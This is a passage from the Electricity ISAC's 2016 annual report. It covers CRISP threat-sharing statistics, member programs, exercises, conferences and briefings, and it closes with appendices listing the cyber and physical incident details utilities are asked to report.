The major events of 2016, along with the trends highlighted in this report, emphasize the importance of user training and individual vigilance. The E-ISAC can assist members in determining the nature of any threat, whether real or perceived. If members provide more information and reporting to the E-ISAC, the E-ISAC can provide better analysis and information sharing.

10 http://www.darkreading.com/threat-intelligence/latest-ukraine-blackout-tied-to-2015-cyberattackers/d/d-id/1327863


Chapter 4: CRISP

Overview

CRISP participant companies serve approximately 75 percent of electricity consumers in the United States. All E-ISAC members benefit from the information gathered regardless of CRISP membership status. The E-ISAC shares CRISP data with users of the secure E-ISAC portal in the form of cyber bulletins. The E-ISAC is involved in several DOE initiatives, one of which is the enhancement of CRISP to provide more usable information to smaller utilities, such as municipal utilities and cooperatives, that currently may not participate in the program. The E-ISAC’s work, along with the DOE’s, is part of the natural maturation of the capabilities of the E-ISAC. The quantity, quality, and timeliness of the CRISP information exchange allow the industry to better protect and defend itself against cyber threats and to make the bulk power system more resilient. In 2016, CRISP identified intrusion methods used by threat actors with a wide variety of technical prowess and continued to identify and monitor activities of threat actors and their escalating risk to the U.S. electricity industry. CRISP provided reporting readily available to the general public on current trending issues, including BlackEnergy, ransomware, and IoT.

CRISP Statistics

CRISP uses many different sources of threat reporting to identify potential IOCs. This year, over 80 percent of CRISP investigations opened were predicated on government-informed reports. In 2016, the E-ISAC saw 41 cases predicated on IOCs provided by CRISP participants that resulted in all-site reports. CRISP all-site reports leverage ISD data and all-source intelligence to provide actionable information to support security operations across the CRISP community, with company-specific information removed. This increased information sharing resulted in enhanced awareness and increased security of CRISP participants. Additionally, anonymized information CRISP shared back to the intelligence community led to the discovery of compromised systems. Table 4.1 details the reporting statistics for 2016.

Table 4.1: CRISP 2016 Reporting Statistics

Product                    2016 Total
Cases Opened               1,480
Analyst Generated Reports  179
Site Annexes               412
Automated Reports          ~160,000

In 2016, the CRISP program and analysts:

Queried and tracked over 18,000 high value threat indicators;

Processed over 250 terabytes of data; and

Provided supply chain research in response to participants’ requests.


Chapter 5: Programs and Engagement

E-ISAC Products and Services

The E-ISAC completed its first year working with the MEC, an ESCC group that consists of three chief executive officers and eight chief information/security officers. This group provides strategic guidance to improve and enhance the E-ISAC, particularly in the areas of the products and services the E-ISAC offers to its members. The MEC meets quarterly and has two working groups that help refine and implement its recommendations. The two working groups are: the Member Engagement, Products, and Services (MEPS) Working Group and the Operations, Tools, and Technologies (OTT) Working Group. In March 2016, the MEC and the E-ISAC finalized a 2016 work plan, which contained several important items for the E-ISAC to address. Some of those items included:

Publish a “How To” Guide: The E-ISAC developed three documents: the E-ISAC brochure, which is a high-level overview of the E-ISAC and the benefits of becoming a member of the E-ISAC; a document titled Engaging the E-ISAC, which provides more detail about the E-ISAC to individuals who are not yet members; and a document titled Understanding Your E-ISAC, which describes everything stakeholders need to know to benefit from the myriad products and services available through E-ISAC membership. All three documents are available on the main page of the E-ISAC portal.

Develop a Prioritized List of E-ISAC Products And Services: To better understand all that the E-ISAC creates and does for its members, the MEPS requested a full list of products and services in which the E-ISAC is engaged; the MEPS then reviewed this list based on the need and utility of each of the products and services. The final list of products and services is available on page 10 of Understanding Your E-ISAC.

Define the E-ISAC’s Role in Classified/Threat Briefings: The E-ISAC worked with its government partners to outline the E-ISAC’s role with the government in facilitating classified/threat briefings. While the E-ISAC does not own the data presented during threat briefings, the E-ISAC does work closely with its government partners to schedule and facilitate threat briefings for industry. In addition to defining this role, the E-ISAC also held its first threat workshop in December (additional information below).

Pilot Automated Information Sharing: The E-ISAC recently initiated its Cyber Automated Information Sharing Service (CAISS) pilot program. The technology behind CAISS provides a standardized, automated, and centralized threat intelligence sharing platform designed to reduce the time analysts need to understand threat information and take action to address it. As of December 31, 2016, the E-ISAC had seven members involved in the project; companies interested in joining the pilot may contact the E-ISAC at [email protected], or (404) 446-9780 #2.

Initiate Improvements to the Portal: One significant change E-ISAC members will see in 2017 is adjustments to the portal. In 2016, the E-ISAC worked with the OTT to develop requirements to enhance portal functions; in 2017, the E-ISAC will move from a portal to a platform. Through much of 2016, the E-ISAC talked with stakeholders about what they would like to see in a new platform. The E-ISAC will implement these changes in 2017.

While enhancing the E-ISAC’s products and services will be an ongoing activity, the E-ISAC, the MEPS, and the OTT made great progress in 2016 to address and implement the MEC recommendations and work plan items.

E-ISAC Threat Workshop

As a result of planning and discussions with representatives from the MEPS, the E-ISAC will host and moderate an unclassified threat workshop twice each year. These threat workshops will bring together security experts from government and industry to discuss threats facing the electricity industry. The discussions may include a focus on


past threats, incidents and lessons learned, current threats that may impact industry, or views on emerging threats. The threat workshop series will occur in June and December of each year in different parts of the United States and Canada. To maximize information sharing with asset owners and operators (AOO), the workshops will include discussions between presenters and attendees during each briefing, with E-ISAC analysis of the topics raised, and will dedicate time to industry discussion after the briefings. The discussions will allow AOOs to describe their own experiences in addressing a particular threat, share best practices, and ask questions of other AOOs with respect to mitigating threats. While the workshop is unclassified, the discussions may reach the TLP: RED level, which is why attendance is limited to AOOs. All attendees will participate with the understanding that information shared will not be attributed outside of the meeting space. Attendees for the workshop series will include AOO E-ISAC members who have an active E-ISAC portal account and serve in the following roles: operational, cyber and physical security analysts, general managers of local utilities, security supervisors, chief security officers, chief information officers, chief information security officers, and security directors. The E-ISAC held its first threat workshop on December 6, 2016, in Washington, DC. Approximately 30 E-ISAC members attended to hear from representatives from DHS, DOE, the FBI, and the National Security Agency. In addition, E-ISAC members heard from E-ISAC analysts about cyber and physical threats and other activities they see on a daily basis. The next workshop is scheduled for June. More details will be available on the portal in March 2017.

Grid Security Exercise (GridEx)

In March 2016, the E-ISAC released three reports regarding the lessons learned on GridEx III. The first report is available in the Public Document Library on the E-ISAC portal at www.eisac.com.11 The second report is TLP: AMBER and is available to AOO members on the secure E-ISAC portal. The third report is a TLP: AMBER executive tabletop report, which was shared only with the participants of the tabletop, the NERC Board of Trustees, the ESCC, the Reliability Issues Steering Committee, and the NERC Critical Infrastructure Protection Committee (CIPC) Executive Committee. These reports summarize the exercise and provide recommendations that the E-ISAC has integrated into its internal crisis action plan and standard operating procedures. In addition, the ESCC has adopted many of the recommendations into its playbook. GridEx IV initial planning is already underway to ensure that all AOOs are able to participate in the manner of their choosing. The E-ISAC hosted over 200 GridEx IV planners at the initial planning meeting on November 14, 2016. Future GridEx IV planning dates include:

Mid-Term Planning Meeting: February 10, 2017

Final Planning Meeting: May 1, 2017

GridEx IV: November 15-16, 2017

Grid Security Conference (GridSecCon)

The E-ISAC hosted over 400 electricity cyber and physical security professionals in Quebec City, Canada, October 17-23, 2016. GridSecCon 2016 provided free training on both physical and cyber security issues and technologies, such as Ukraine, Grassmarlin, and Cyber Attack Defense Training Exercise for the Grid. The conference included

11 www.eisac.com


speaker sessions discussing industry’s work with government partners, space weather, hunting and killing on networks, and advanced research and development in the sector.

GridSecCon 2017 Dates:

Request for presentations/Speakers Distributed: February 2017

GridSecCon 2017: October 17-20, 2017: St. Paul, Minnesota

Cross-Sector Activities

The E-ISAC engages with the government at all levels, including international, federal, state, local, territorial, tribal, and provincial governments. It is also a close ally of critical infrastructure protection sector partners and other ISACs. During 2016, the E-ISAC’s federal partners were active in response to Presidential Policy Directive 41: United States Cyber Incident Coordination and created projects covering cyber mutual assistance, high profile exercises, cyber incident response plans, learning opportunities for E-ISAC staff, and power outage incident technical reference products. The E-ISAC worked closely with its federal partners in support of their activities and provided feedback where appropriate, such as with the recently updated National Cyber Incident Response Plan (NCIRP). The E-ISAC has also maintained participation with the National Cyber Security and Communications Integration Center, the National Integration Center, and the National Operations Center. Through the National Council of ISACs (NCI), the E-ISAC is able to collaborate with all critical infrastructure-specific ISACs. The E-ISAC assisted the NCI in establishing new information sharing procedures and collaborative analytical approaches. This partnership helped lead to additional threat briefing opportunities and increased information


sharing. Furthermore, this partnership allowed the E-ISAC to provide additional insight and analysis on key issues, such as Ukraine and the IoT emerging issues. This year, the E-ISAC hosted approximately 20 visits to the E-ISAC from AOOs and cross-sector partners. The E-ISAC also helped develop TLP Guidance used by US-CERT and is currently developing common language for all ISACs to use when discussing TLP: Amber information.

E-ISAC Monthly Briefing Series Update

The E-ISAC continues to host its Monthly Briefing Series for AOOs, covering timely critical infrastructure protection topics for participants. The briefings involved federal and technical partners, including Department of Homeland Security staff from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Office of Intelligence and Analysis, and the National Cybersecurity and Communications Integration Center (NCCIC), as well as FireEye and iSIGHT Partners. The Monthly Briefing Series also includes special guest presentations. During 2016, the E-ISAC invited members, federal and private partners, national labs, and other guests to discuss the following topics:

2016: January–June

Starting the Hunt: Using the Hunting Maturity Model to Develop Capability

ICS Security Operations Center Initiative

Applying the National Institute of Standards and Technology Cybersecurity Framework: Update and Lessons Learned (an AOO Member presentation)

GridEx III Lessons Learned

Cyber Security Testing with the National Guard (an AOO Member presentation)

Primer: ICS Active Defense

2016: July–December

Design Basis Threat: Tool developed by the E-ISAC Physical Security Advisory Group

Communications Sector Preparedness and Disaster Recovery

Critical Infrastructure Cyber Incident Response: Insights and Best Practices

National Cyber Security Awareness Month: Themes, Updates, and Engagement

Shodan for Critical Infrastructure Defenders

2015 Attacks on Ukrainian Critical Infrastructure (November 2016 updated report)

Participation in the monthly briefings during 2016 ranged from 180 to over 400 attendees. This year was the first full year that the series included a physical security section (added April 2015) and full replays were available for member download (added December 2015). Based on polling feedback, 70 to 96 percent of attendees consider the meetings to be of “Considerable Value” or “Great Value.” The E-ISAC will continue to encourage industry to share security best practices and lessons learned on topics relevant to the sector by inviting more industry AOOs as guest presenters. Sets of early-release webinar information are typically provided the day following the webinar.

Monthly Briefing Series: A Look at 2017

In an effort to share more specific and relevant information on our monthly briefing call, the E-ISAC has invited AOO members to submit their ideas on critical infrastructure protection topics. This change in the 2017 monthly briefing series is to better serve the E-ISAC members’ needs.


Chapter 6: Conclusion

2017 Outlook

Increased physical security and cyber security information sharing will enable more complete analysis by the E-ISAC. Robust data over time helps identify important trends and patterns. In 2017, the E-ISAC will continue to review and apply recommendations from the ESCC and NERC’s CIPC. The E-ISAC plans to continue adding capabilities and new products and encourage active involvement from members of the electricity industry. The E-ISAC’s aim is to add value for its members and assist with overall risk reduction across the Electric Reliability Organization Enterprise by providing timely information and analysis. The E-ISAC encourages participation at all levels but especially from electric utility operations, safety, security, and reliability teams. Additional information on what and how to share with the E-ISAC can be found in Appendix A of this report. Members are urged to fill out the survey below. Feedback on ways to improve this report is welcomed, including the types of data, its analysis, and any other information that would be of value to members.

The Electricity Information Sharing and Analysis Center (E-ISAC)

Operated by NERC in Washington, D.C., the E-ISAC establishes situational awareness, incident management, coordination, and communication capabilities across the electric industry through timely, reliable, and secure information exchange. The E-ISAC, in collaboration with the Department of Energy and the Electricity Subsector Coordinating Council, serves as the primary security communications channel for the electric industry and enhances industry’s ability to prepare for and respond to cyber and physical threats, vulnerabilities, and incidents.

E-ISAC Contact
24x7 Phone: 1-404-446-9780
E-mail: [email protected]
For E-ISAC information: https://www.eisac.com/

What is this?
This is an annual report. It is designed to improve sector physical and cyber security awareness by summarizing activities observed and shared with the E-ISAC. The content highlights both public and private reports the E-ISAC is tracking. Compliance Officers in receipt of this report are encouraged to share it with their security and operations team.

This report is accessible via the E-ISAC private portal at https://www.eisac.com/


Appendix I

Table I.1 Cyber Information to Share

Types of information/activities to share

Information on cyber events that have been classified as incidents by your organization.

Cyber incident-specific details on the type of impact observed:
Data-specific impacts: data destruction, data theft, or data manipulation/encryption.
Operational technology impacts: loss of operator situational awareness, impacts to operator process visibility, or manipulation of process control.

Threats received of intended cyber malicious activities (publicly or privately) to either employees or the company.

Other public events, such as website defacements, DDoS activity, etc.

Actionable information

This largely encompasses IOCs from observed events. IOCs are the observable artifacts left by an attempted (successful or unsuccessful) attack or intrusion. The E-ISAC can also assist in determining IOCs if a member can only provide forensic artifacts, such as network traffic or binary files.

Details to provide about the event

Malicious or suspicious email messages. Include the full email details to assist other utilities in searching for variations based on sender addresses, subject lines, email texts, Internet links, attachment names, attachment unique identifiers, and attachment files for analysis of file behavior.

Network traffic summarization, including the suspicious source IP address and the source or destination communication ports. This information will allow other entities to see if they are receiving potentially malicious communications from the same IP address or over the same communication ports.

Malicious website activity targeting company websites or websites used by industry asset owners and operators.

Malicious files or activity associated with removable media. Include samples of the malicious files or unique signatures of the malicious files that other entities can search within their environment.

Other suspicious activity related to electric systems operations technology.

Where to find information to share

Suspicious email messages and attachments.

Detected malicious files.

Network captures from targeted environments.

Memory images of impacted devices.

Disk images from impacted devices.

System log files.

Application log files.


Table I.2 Physical Information to Share

Types of information/activities to share

Expressed or implied threat: Receipt of verbal or written threat to commit a crime that will result in death or bodily injury to another person(s), or to damage or compromise a facility/infrastructure or secured protected site.

Break-ins/attempted break-ins: Unauthorized personnel attempting to enter or actually entering a restricted area, or secured protected site.

Sabotage, tampering, or vandalism: Discovery of damage, defacement, or destruction of an electrical facility/infrastructure or secured protected site.

Theft, loss, or diversion: Indications of individuals stealing or diverting something associated with a facility/infrastructure or secured protected site.

Social Engineering attempts: Discovery of an individual presenting false information or misusing insignia, documents, identification, etc., to misrepresent affiliation as a means of concealing possible illegal activity. Individuals soliciting information at a level beyond mere curiosity about a public or private event, or about particular facets of a facility or building and its purpose, operations, or security procedures.

Observation, surveillance: Unknown drones flying or hovering over power plants, substations, or transmission lines. Individuals demonstrating unusual or prolonged interest in facilities, buildings, or infrastructure beyond mere casual (e.g., tourists) or professional (e.g., engineers) interest.

Actionable information

This largely encompasses the details of observed behavior or physical evidence available at a location where the physical event occurred.

Details to provide about the event

Details of physical event, including time discovered, estimated time of occurrence, if suspects are in custody, risk assessment to personnel and facilities.

Physical description of suspects and photos.

Vehicle description, license plates, and photos.

Description of suspect communication, accent, tone, background noise, phone number, and time contacted.

Suspicious behavior description: Observation through binoculars, taking notes, attempting to mark off or measure distances, photography, or video of facility.

Suspicious item details: Photos of suspicious package, details of potential explosive device, where discovered, likely time of placement, typical access to the location, and description of how it was discovered.

Where to find information to share

Human observation: Onsite security staff and witness reports.

Monitoring systems: Camera and video recording, physical security system alerts, cable tray detection systems, and motion detection alerts.

Logs: Phone system, door/facility gate events, visitor sign in, security staff reports, and shift turn over records.

Please indicate the degree of usefulness of this E-ISAC Product, Service or Tool.

How useful was this document or report?
Extremely Useful / Very Useful / Neutral / Somewhat Useful / Not Useful

Any specific feedback you would like to provide?

To submit this survey, click "Save As" and email the document to the E-ISAC staff member Beth Gannett, Manager of Engagement & Member Services, at [email protected].